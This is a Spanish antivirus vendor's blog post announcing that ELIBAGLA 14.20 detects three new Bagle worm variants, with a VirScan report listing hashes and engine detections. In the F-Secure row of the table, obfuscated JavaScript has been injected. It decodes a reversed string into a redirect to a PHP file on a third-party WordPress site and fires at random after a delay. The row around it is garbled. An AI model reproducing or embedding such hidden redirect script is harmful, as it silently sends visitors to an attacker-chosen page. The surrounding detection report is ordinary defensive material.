Nuevas variantes del ya conocido BAGLE que se controlan con ELIBAGLA 14.20
La heuristica del ELIBAGLA ha cazado y pedido muestras de estos tres ficheros:
WINUPGRO.EXE.Muestra EliBagle v14.19
WINTEMS.EXE.Muestra EliBagle v14.19
MDELK.EXE.Muestra EliBagle v14.19
A partir del ELIBAGLA 14.20, se controlan dichas variantes
En el preanalisis de VirScan una de las muestras ofrece el siguiente informe:
Información Archivo
Nombre Archivo : WINTEMS.EXE.Muestra EliBagle v14.19
Tamaño Archivo : 69903 byte
Tipo Archivo : PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5 : b12b2ed12aa81d760e7cfc505bb02630
SHA1 : 8df41c7af4255b0d29b33d39da581f3315f1035f
Resultados
Resultados : 49% Escaner (18/37) encontró infección
Tiempo : 2012/09/25 12:29:43 (CEST)
Escaner Versión Motor Versión Firma Fecha Firma Resultados Tiempo
a-squared 5.1.0.4 20120925110432 2012-09-25 Worm.Win32.Bagle!IK 8.745
AhnLab V3 2012.09.25.00 2012.09.25 2012-09-25 – 2.777
AntiVir 8.2.10.150 7.11.41.132 2012-09-01 – 0.000
Antiy 2.0.18 20120911.20371576 2012-09-11 – 0.000
Arcavir 2011 201209241316 2012-09-24 – 0.000
Authentium 5.1.1 201209090949 2012-09-09 – 0.000
AVAST! 4.7.4 120925-0 2012-09-25 – 0.000
AVG 12.0.1794 2441/5290 2012-09-24 – 0.000
BitDefender 7.90123.7641390 7.43541 2012-09-25 – 0.000
ClamAV 0.97.5 15399 2012-09-25 – 0.000
Comodo 5.1 13649 2012-09-25 Packed.Win32.Packer.~GEN 2.239
CP Secure 1.3.0.5 2012.09.25 2012-09-25 – 0.000
Dr.Web 7.0.3.7130 2012.09.24 2012-09-24 – 0.000
F-Prot 4.6.2.117 20120924 2012-09-24 – 0.000
F-Secure 7.02.73807 2012.09.25.02 2012-09-25 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:Win32.Bagle.SUQ@mm”>Win32.Bagle.SUQ@mm [Engine:A] 5.976
Ikarus T3.1.32.20.0 2012.09.25.82346 2012-09-25 Scan_Timeout! 0.000
JiangMin 13.0.900 2012.09.25 2012-09-25 I-Worm/BBEagle.axy 2.253
Kaspersky 5.5.10 2012.09.25 2012-09-25 – 0.000
KingSoft 2009.2.5.15 2012.9.25.9 2012-09-25 – 0.949
McAfee 5400.1158 6845 2012-09-24 Scan_Timeout! 0.000
Microsoft 1.8800 2012.09.24 2012-09-24 TrojanProxy:Win32/Mitglieder 3.848
NOD32 3.0.21 7513 2012-09-25 Win32/Bagle.TK worm 3.773
Norman 6.8.3 201208311030 2012-08-31 – 0.000
nProtect 20120924.01 12095301 2012-09-24 Worm/W32.Bagle.69903 1.634
Panda 9.05.01 2012.09.24 2012-09-24 W32/Bagle.RC.worm 2.798
Quick Heal 11.00 2012.09.24 2012-09-24 I-Worm.Bagle.of3 1.360
Rising 20.0 24.29.01.01 2012-09-25 Trojan.Win32.Generic.129D6CD1 2.776
Sophos 3.35.1 4.81 2012-09-25 Scan_Timeout! 0.000
Sunbelt 3.9.2545.2 13218 2012-09-24 Email-Worm.Win32.Bagle.of (v) 1.313
Symantec 1.3.0.24 20120924.002 2012-09-24 Trojan.Lodeight.C 10.763
The Hacker 6.8.0.0 v00101 2012-09-24 W32/Bagle.of 0.677
Trend Micro 9.500-1005 9.422.01 2012-09-24 – 0.000
VBA32 3.12.18.1 20120924.0756 2012-09-24 – 0.000
ViRobot 20120924 2012.09.24 2012-09-24 – 0.397
VirusBuster 5.5.2.13 15.0.199.0/9817903 2012-09-24 Scan_Timeout! 0.000
La version del ELIBAGLA 14.20 que los detecta y elimina ya está disponible en nuestra web
saludos
ms, 25-9-2012
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Los comentarios están cerrados.